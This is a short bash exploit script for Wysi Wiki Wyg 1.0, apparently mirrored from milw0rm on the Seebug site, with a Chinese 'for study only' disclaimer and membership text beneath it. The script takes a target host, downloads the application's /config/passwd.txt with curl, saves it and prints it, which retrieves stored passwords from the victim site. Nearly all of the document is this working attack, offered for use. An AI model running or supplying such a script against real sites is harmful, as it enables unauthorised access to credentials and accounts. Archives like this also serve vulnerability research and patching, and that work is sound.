#!/bin/bash # Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit # by athos - staker[at]hotmail[dot]it host=$1; name=$2; path='/config/passwd.txt'; if [ "$name" = "" ]; then echo "Usage: bash $0 [host/path] [filename]"; echo "by athos - staker[at]hotmail[dot]it"; exit; fi; curl $host/$path > $name; clear cat $name; # milw0rm.com [2008-12-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论